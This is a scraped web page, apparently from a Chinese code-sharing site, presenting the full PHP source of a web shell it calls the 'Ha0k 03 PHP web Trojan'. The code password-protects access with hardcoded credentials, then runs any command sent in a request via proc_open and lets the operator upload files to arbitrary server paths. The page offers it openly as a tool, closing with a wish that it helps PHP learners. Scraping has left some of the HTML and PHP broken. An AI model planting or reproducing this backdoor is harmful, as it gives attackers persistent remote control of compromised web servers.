Ha0k 03 PHP web Trojan modified version

Copy the code The code is as follows:

//Multiple users can be set here
$passwd = array('ha0k' => 'ha0k',
'hackerdsb'=>'hackerdsb');
/* Set here Command aliases*/
$aliases = array('ls' => 'ipconfig',
'll' => 'ls -lvhF');
if (!isset($_SERVER['PHP_AUTH_USER'])| |!isset($_SERVER['PHP_AUTH_PW'])||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER[' PHP_AUTH_PW']) {
header('WWW-Authenticate: Basic realm="by Ha0k"');
header('HTTP/1.0 401 Unauthorized');
$authenticated = false;
}
else {
$authenticated = true;
/* Start session */
session_start();
/* Initialize session. */
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd(); //Get the current directory
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty ($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) { //0 table is closed, 1 table is on, filter when on
/* We don't want to add the commands to the history in the
* escaped form, so we remove the backslashes now. */
$_REQUEST['command'] = stripslashes($_REQUEST['command']); //Return the string processed with the addslashes() function to its original state
}
/* history */
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) //Find the value in the saved array
unset($_SESSION ['history'][$i]); //Destroy
array_unshift($_SESSION['history'], $_REQUEST['command']); //The array_unshift() function is to insert new items into an array element. And this new array will be added to the beginning of the original array. What the function ultimately returns is the array after inserting new elements.
/* 输出Ha0k# command */
$_SESSION['output'] .= 'Ha0k# ' . $_REQUEST['command'] . "n";
/* Initialize the current working directory. */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname(__FILE__); //获取当前所在目录
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
if ($regs[1][0] == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/..(?!.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/..(?!.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) { //改变当前目录
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dirn";
}
} else {
/* The command is not a 'cd' command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']); //改变目录
/* 别名扩展 */
$length = strcspn($_REQUEST['command'], " t"); //查找t字符串，返回位置
$token = substr($_REQUEST['command'], 0, $length); //取字符串0-t
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
$p = proc_open($_REQUEST['command'], //执行脚本
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
/* 读出发送 */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]), //转换特殊字符为HTML字符编码
ENT_COMPAT, 'GB2312');
}
/* 读出 */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'GB2312');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);//关闭管道
}
}
/* 构建在JavaScript使用命令历史记录 */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';//将数组搞成字符串
}
}
header('Content-Type: text/html; charset=GB2312');
echo '' . "n";
?>
if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
//echo "上传文件成功: " . $HTTP_POST_FILES['userfile']['name'];
}
?>
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">






HA0K

WE JUST FOR JUSTICE，FIGHT FOR EVIAL

You failed to authenticate yourself to PhpShell. You can href="">reload to try again.

Try reading the INSTALL file if you're having
problems with installing PhpShell.

exit;
}
error_reporting (E_ALL);
if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 10;
?>

当前目录为: <?php echo $_SESSION['cwd'] ?>

<br><?php <BR>$lines = substr_count($_SESSION['output'], "n"); <BR>$padding = str_repeat("n", max(0, $_REQUEST['rows']+1 - $lines)); <BR>echo rtrim($padding . $_SESSION['output']); <BR>?> <br><

$  size="78" tabindex="1">

行数:

本地文件名:

远程文件名:

 Mcafee(麦咖啡杀毒软件) 防止网页被挂马的设置教程(最后不要在服务器端打开) 我们强烈推荐服务器安装mcafee 8.5i的版本
全世界最小的php网页木马一枚 附PHP木马的防范方法

以上就介绍了 Ha0k 03 PHP 网页木马修改版，包括了方面的内容，希望对PHP教程有兴趣的朋友有所帮助。